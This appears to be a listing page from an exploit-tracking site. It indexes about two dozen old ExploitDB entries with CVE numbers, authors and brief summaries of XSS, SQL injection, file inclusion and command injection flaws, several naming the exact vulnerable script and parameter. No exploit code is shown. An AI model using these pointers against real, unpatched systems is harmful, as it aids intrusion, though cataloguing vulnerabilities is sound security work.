Exploitdb Exploits

31,348 exploits tracked across all sources.

Sort: Activity Stars
CVE-2009-0573 EXPLOITDB text VERIFIED
FotoWeb 6.0 Build 273 - Cross-Site Scripting via Login and Grid Search Parameters
Multiple cross-site scripting (XSS) vulnerabilities in FotoWeb 6.0 (Build 273) allow remote attackers to inject arbitrary web script or HTML via the (1) s parameter to cmdrequest/Login.fwx and the (2) search parameter to Grid.fwx.
by Stelios Tigkas
CVE-2009-1256 EXPLOITDB text VERIFIED
FlexCMS 2.5 - SQL Injection via ItemId Parameter
SQL injection vulnerability in FlexCMS 2.5 allows remote attackers to execute arbitrary SQL commands via the ItemId parameter. NOTE: some of these details are obtained from third party information.
by MisterRichard
EIP-2026-107014 EXPLOITDB text VERIFIED
eZoneScripts (Multiple Scripts) - Insecure Cookie Authentication Bypass
by JIKO
CVE-2009-0516 EXPLOITDB text VERIFIED
BusinessSpace < 1.2 - SQL Injection via Classified Page id Parameter
SQL injection vulnerability in the classified page (classified.php) in BusinessSpace 1.2 and earlier allows remote attackers to execute arbitrary SQL commands via the id parameter to index.php.
by K-159
EIP-2026-105490 EXPLOITDB text VERIFIED
Bitrix Site Manager 6/7 - Multiple Input Validation Vulnerabilities
by aGGreSSor
CVE-2009-0527 EXPLOITDB text VERIFIED
AdaptCMS Lite 1.4 - Remote Code Execution via RSS Importer Sitepath Parameter
PHP remote file inclusion vulnerability in plugins/rss_importer_functions.php in AdaptCMS Lite 1.4 allows remote attackers to execute arbitrary PHP code via a URL in the sitepath parameter.
by RoMaNcYxHaCkEr
CVE-2009-0531 EXPLOITDB text VERIFIED
A Better Member-Based ASP Photo Gallery <1.2 - SQL Injection
SQL injection vulnerability in gallery/view.asp in A Better Member-Based ASP Photo Gallery before 1.2 allows remote attackers to execute arbitrary SQL commands via the entry parameter.
by BackDoor
CVE-2009-0611 EXPLOITDB text VERIFIED
Novell Open Enterprise Server 1.x - XSS
Multiple cross-site scripting (XSS) vulnerabilities in qfsearch/AdminServlet in QuickFinder Server in Novell Open Enterprise Server 1.x allow remote attackers to inject arbitrary web script or HTML via (1) the siteloc parameter in a displayaddsite action, the site parameter in a (2) generalproperties or (3) clusterserviceproperties action, (4) the adminurl parameter in a global action, or (5) the print-list parameter.
by Ivan Sanchez
EIP-2026-104053 EXPLOITDB text VERIFIED
PyBlosxom 1.6.3 Atom Flavor - Multiple XML Injection Vulnerabilities
by Nam Nguyen
CVE-2009-0545 EXPLOITDB text VERIFIED
ZeroShell <1.0beta11 - Command Injection
cgi-bin/kerbynet in ZeroShell 1.0beta11 and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in the type parameter in a NoAuthREQ x509List action.
by ikki
EIP-2026-101145 EXPLOITDB text VERIFIED
3Com OfficeConnect Wireless Cable/DSL Router - Authentication Bypass
by ikki
EIP-2026-101054 EXPLOITDB text VERIFIED
Nokia N95-8 - '.jpg' Remote Crash (PoC)
by Juan Yacubian
CVE-2009-0680 EXPLOITDB text VERIFIED
Netgear SSL312 - Denial of Service via Crafted Query String
cgi-bin/welcome/VPN_only in the web interface in Netgear SSL312 allows remote attackers to cause a denial of service (device crash) via a crafted query string, as demonstrated using directory traversal sequences.
by Rembrandt
CVE-2009-0570 EXPLOITDB text VERIFIED
Ninja Designs Mailist 3.0 - Path Traversal
Directory traversal vulnerability in send.php in Ninja Designs Mailist 3.0, when register_globals is enabled and magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the load parameter. NOTE: some of these details are obtained from third party information.
by SirGod
EIP-2026-114620 EXPLOITDB text VERIFIED
Zeroboard4 pl8 (07.12.17) - Multiple Vulnerabilities
by make0day
CVE-2009-0602 EXPLOITDB text VERIFIED
WikkiTikkiTavi 1.11 - Unauthenticated Arbitrary File Upload and Remote Code Execution via upload.php
Unrestricted file upload vulnerability in upload.php in WikkiTikkiTavi 1.11 allows remote attackers to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in img/.
by ByALBAYX
EIP-2026-112046 EXPLOITDB text VERIFIED
SilverNews 2.04 - Authentication Bypass / Local File Inclusion / Remote Code Execution
by x0r
CVE-2009-0639 EXPLOITDB text VERIFIED
phpyabs 0.1.2 - Remote Code Execution via Azione Parameter
PHP remote file inclusion vulnerability in moduli/libri/index.php in phpyabs 0.1.2 allows remote attackers to execute arbitrary PHP code via a URL in the Azione parameter.
by Arka69
CVE-2009-0571 EXPLOITDB text VERIFIED
Ninja Designs Mailist <3.0 - Info Disclosure
admin.php in Ninja Designs Mailist 3.0 stores backup copies of maillist.php under the web root with insufficient access control, which allows remote attackers to obtain sensitive information via a direct request to the backup directory.
by SirGod
EIP-2026-107779 EXPLOITDB text VERIFIED
Ilch CMS 1.1 - 'HTTP_X_FORWARDED_FOR' SQL Injection
by Gizmore
CVE-2009-0574 EXPLOITDB text VERIFIED
Easy CafeEngine - SQL Injection via catid Parameter
SQL injection vulnerability in index.php in Easy CafeEngine allows remote attackers to execute arbitrary SQL commands via the catid parameter, a different vector than CVE-2008-4604.
by SuNHouSe2
CVE-2009-0765 EXPLOITDB text VERIFIED
Kipper 2.01 - Path Traversal via Configfile Parameter
Directory traversal vulnerability in index.php in Kipper 2.01 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the configfile parameter.
by RoMaNcYxHaCkEr
CVE-2009-0763 EXPLOITDB text VERIFIED
Kipper 2.01 - Cross-Site Scripting via Charm Parameter
Cross-site scripting (XSS) vulnerability in default.php in Kipper 2.01 allows remote attackers to inject arbitrary web script or HTML via the charm parameter.
by RoMaNcYxHaCkEr
CVE-2009-0767 EXPLOITDB text VERIFIED
bookelves kipper 2.01 - Unauthenticated Credential Exposure via Direct Request
Kipper 2.01 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a file containing credentials via a direct request for job/config.data.
by RoMaNcYxHaCkEr
CVE-2009-0455 EXPLOITDB text VERIFIED
glFusion < 1.1.1 - Cross-Site Scripting via Anonymous Comments Username Parameter
Cross-site scripting (XSS) vulnerability in the anonymous comments feature in lib-comment.php in glFusion 1.1.0, 1.1.1, and earlier versions allows remote attackers to inject arbitrary web script or HTML via the username parameter to comment.php.
by Bjarne Mathiesen Schacht
By Source
All 31,348 Writeup 60,708 Exploitdb 50,017 Nomisec 22,008 Metasploit 3,235 Github 3,035 Vulncheck_xdb 909 Inthewild 514 Gitlab 461 Gitee 415 Patchapalooza 312
By Language
text 31,348 python 6,251 ruby 5,925 c 3,601 perl 2,849 html 2,057 php 1,327 bash 460 java 364 c++ 253 javascript 221 shell 106 go 65 postscript 25 xml 24